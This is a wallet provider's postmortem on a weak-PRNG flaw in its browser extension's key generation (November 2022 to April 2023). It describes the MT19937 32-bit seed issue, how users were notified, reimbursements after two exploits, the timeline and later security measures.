This postmortem provides an in-depth account of the vulnerability and the assertive steps we undertook to protect our users’ wallets. For a summary of the incident and FAQ, please refer to our disclosure statement.
The Vulnerability
In November 2022, a vulnerability was discovered in the back-end module WebAssembly (WASM) located in the open source repository wallet core, which affected new wallets generated by versions 0.0.172 and 0.0.182 of the Browser Extension. Only the private keys of the limited new wallets created in these versions are affected. Since the vulnerability was fixed on November 22, 2022, all other Browser Extension versions, including the existing version, are safe to use. Imported wallets and mobile wallets are not affected by this issue.
The version of WASM that was affected utilized MT19937, a Mersenne Twister pseudo-random number generator (PRNG) with a state size of 19937 bits to produce mnemonics. This PRNG requires a single 32-bit seed value to begin the generation process. However, due to the limited size of the seed, the WASM version could only produce approximately 4 billion possible mnemonics. Additionally, because the MT19937 is based on a linear recursion method, the resulting pseudo-random sequence is not secure enough for cryptographic purposes. A long sub-sequence of output numbers could be used to predict subsequent outputs, which poses a security risk.
Please note that this issue is not yet registered as a Common Vulnerabilities and Exposures (CVE). However, another team discovered a similar issue in the Intel Paillier Cryptosystem Library, which can be found here: Insecure PRNG in key generation · Issue #2 · intel/pailliercryptolib · GitHub.
The problem lies in the fact that the MT19937 pseudo-random number generator does not provide a sufficient level of randomness. When this generator was used to create private keys, a skilled individual (potentially a bad actor) could monitor enough iterations to predict future iterations. If that individual knows that a specific wallet address was created using MT19937, they could access the private key of a wallet associated with a given public address with medium to high computational power. Alternatively, a malicious actor could create a massive database that contains all possible 2^32 outputs generated by MT19937, and by reverse engineering, could match private keys to a large set of vulnerable addresses across different chains.
During our impact analysis process, we identified a few other wallet addresses (less than 100) that were created with the same MT19937 issue. Some of these wallets were created several years ago, and most of them were not being actively used.
Trust Wallet’s Response to the Vulnerability
The code that caused the vulnerability was promptly fixed within 1 day of the verification of the bug bounty. This ensured that any wallet addresses created after the fix were not susceptible to the vulnerability. However, the vulnerability existed in the addresses that were created between version 0.0.172 and version 0.0.182 themselves. The Trust Wallet development team could not eliminate the vulnerability for the wallets created using vulnerable versions without the involvement of affected address owners. To be free from the vulnerability, users must migrate their assets from the affected wallet addresses to new, non-affected wallet addresses. For clarity, this action must be performed by the wallet address owners themselves. Under these circumstances, we undertook every possible measure to inform users and assist them in mitigating the risk of potential attacks.
The Trust Wallet team has been working hard to ensure the safety of our users’ assets on the affected wallet addresses. To make sure that we reach as many affected users as possible, we have used all the available means to notify them and encourage them to transfer their assets from the affected wallet addresses. We have used a multi-channel notification strategy which has included 1-1 in-app warnings that appear every 1 minute and mobile push notifications.
Affected users would have seen a warning message on their Browser Extension, in which we provided clear instructions on how to transfer their assets into a non-custodial wallet or a centralized exchange. In addition, to ensure our users that the warning banner was not a scam, a Trust Wallet security overview blog post was published on December 7, 2022, where the “Extension warning banner” was illustrated as the official and legitimate warning message from Trust Wallet.
Additionally, when we discovered that the upstream funding of the wallet addresses came from Binance based on public on-chain data, we contacted Binance to assist in notifying the users while maintaining their privacy. It’s important to note that we take the protection of our users’ privacy seriously. No personally identifiable information has ever been shared between Binance and Trust Wallet, and we appreciate Binance’s customer support team helped to reach the affected users that they could reach.
We deliberated whether to disclose the vulnerability once all feasible fixes were implemented. However, after thorough evaluation, we determined that an early public disclosure might have exposed the majority of affected users’ funds to an immediate, near-certain risk of hacking. Our primary objective was to help users preserve as much of their assets as possible and prevent potential losses. We believed that confidential, one-on-one communication with users would enable users to take the necessary actions without sacrificing their assets’ sole ownership.
We also provided assistance to customers affected by this vulnerability by offering customer support and reimbursing them for their gas fees. As of today, in total we reimbursed ~23.6 BNB in gas fees to multiple users who transferred their assets to a secure location.
With our extensive notification efforts in the last five months, the majority of the assets in the affected wallet addresses have been moved to safe locations by the users.
While some risk persists in disclosing this information at this time, the majority of funds have been transferred and secured by users over the past few months. Consequently, the operational cost for a bad actor to exploit the vulnerability has increased, relative to the potential gains from the remaining affected wallets; currently, these wallets hold approximately $88,300 USD across ~500 affected wallets with a balance higher than $10 USD worth of tokens. Additionally, the vulnerability has now been expressly pinpointed and patched.
The Reimbursement Process
Despite our best efforts, two exploits occurred, resulting in a total loss of approximately $170,000 USD at the time of the attack.
We will continue to support our users and encourage any remaining affected users to take the steps to secure their wallets and/or claim their reimbursement.
We know the exact list of affected wallets. Please check your Browser Extension to see if you have received a notification and carefully read through the reimbursement process to see if you are relevant as a victim to claim the reimbursement.
If you haven’t received a notification in your Trust Wallet browser extension, your wallet address was not affected by the vulnerability at all and is safe to use.
Timeline
November 2022
- On November 17, a security researcher identified and reported a vulnerability to us via the Trust Wallet bug bounty program.
- The vulnerability was verified and confirmed to be critical for the team to take immediate actions.
- Within 1 day of verifying the vulnerability, we applied a patch to the back-end module (WAS) located in the open-source repository wallet core, to fix the issue.
- Within 2 days, Browser Extension v0.0.183 was released. New wallets created from this version are no longer vulnerable. Users with the affected versions were automatically updated to the new secure version.
- Browser Extension v0.0.187 was released, adding the ability to display a warning banner to impacted wallet owners. The warning said about the existing wallet addresses’ risk and urged the owners to move their assets to other secure wallet addresses, following a step-by-step guide.
- In addition to the In-app browser warning for the affected users, Trust Wallet security scanner started to warn users to not transfer assets into the affected wallets, to prevent increasing risk exposure for the users.
- We delivered multiple push notifications on Trust Wallet mobile applications that identified to be associated with the affected wallet addresses.
- We provided gas fee reimbursements for users who moved their assets because of the incident, and continue to do so.
- We prepared a public disclosure statement. However, we considered that once the disclosure was made, a bad actor could exploit the remaining wallets and take ownership of the funds left. Therefore, we gave affected users more time to secure their fund instead of making an premature disclosure.
December 2022
- Browser Extension v0.0.200 went live. Added a warning icon badge to the affected wallets.
- Sent another round of mobile push notifications.
- Published Trust Wallet security overview blog post to help our users understand that the in-app warning banner is not a scam.
- 1st exploit observed. Received Customer Service tickets from the affected users. Started the reimbursement processes.
February 2023
- Reassessed the disclosure timeline. Decided to give more time for the affected wallet users to secure the funds.
March 2023
- Bug Bounty was paid out to the security researcher.
- 2nd exploit observed. Received Customer Service tickets from the victims who were affected by the exploit. Started the reimbursement processes.
- Met with the Ledger team to analyze the industry precedents to handle similar situations.
April 2023
- The majority of assets on the vulnerable wallet addresses have already been secured by the wallet owners.
- Display an updated warning message to the affected wallet. Provide additional information related to the reimbursement guide.
- The vulnerability disclosure and postmortem were published.
Moving Forward
We want to assure our users that we are taking this matter seriously and are actively working to recover the stolen assets in the exploits. Our team is collaborating with security experts to conduct a thorough investigation to identify the culprits and hold them accountable. To further incentivize anyone with information on the matter, we are offering a bounty for information that directly leads to the identification of the responsible parties.
Providing a secure wallet for our users’ to safeguard their funds is a top priority at Trust Wallet. We have made significant investments in improving our security measures to better protect our users and their funds. Let’s have a look at some of the things we do to keep our user’s secure.
Security audits
We have increased our security audits and audit coverage over the last few months to five times more. These include code review, design review, and penetration testing. These increased efforts will help us identify vulnerabilities before they are exploited and prevent future incidents.
Internal security review
Our internal security team performs regular security reviews, covering both application and infrastructure security. This ongoing process ensures that we maintain a high level of security and are always improving our security posture.
External auditors
We have engaged multiple top-tier, third-party external auditors to assess our application security. This due diligence ensures that we have an independent assessment of our security protocols and measures and identifies any improvement opportunities that we may need to address. You can read the latest security audit reports here.
Internal security training
We have company wide security training for employees to heightened security awareness and improve security practices.
User security
Not directly due to this incident, but we have always been making progress on features to support users keep themselves from harm.
The Trust Wallet Browser Extension integrated with hardware wallet Ledger in January, 2023. This adds another layer of security to protect users’ private keys.
Our Security Scanner feature warns users whenever they interact with a known risky address or the smart contract of a malicious dApp. This helps our users to make informed decisions about their transactions.
By implementing these measures, we are confident that we are taking all the necessary steps to enhance our security, ensuring that users’ wallets are protected and prevent similar incidents occurring in the future.
We will continue to work with the community to proactively identify and resolve any vulnerabilities and are constantly looking for ways to improve our processes to ensure that we are identifying and mitigating security risks as early as possible.
We would like to sincerely thank the community for the support to make Trust Wallet a safe platform. We’re deeply sorry this incident occurred and apologise for any distress it may have caused our users. Fortunately, none of our users will be negatively impacted. Please continue to let us know how we can better improve security, reduce risk, and improve our support so that we can continue to earn your trust.
Special Thanks
We would like to express our sincere appreciation to the security researcher Jean-Baptiste Bédrune, who discovered and reported the vulnerability to us. His contribution has been invaluable in helping us ensure the security of users’ wallets. As a token of our gratitude, we have already awarded the security researcher with the highest level of our bounty reward.
We would like to thank the Ledger security team, especially their CTO Charles Guillemet, for working diligently with us to provide feedback and suggestions on how to approach this situation to produce the best outcome for our users and the community.
Finally, we would also like to extend our gratitude to the Binance security team for their exceptional handling of the bug bounty process. Their expertise in triaging the issue, conducting risk assessments, escalating the matter, conducting impact analysis, and communicating with the security researcher was vital in minimizing the overall impact of the vulnerability.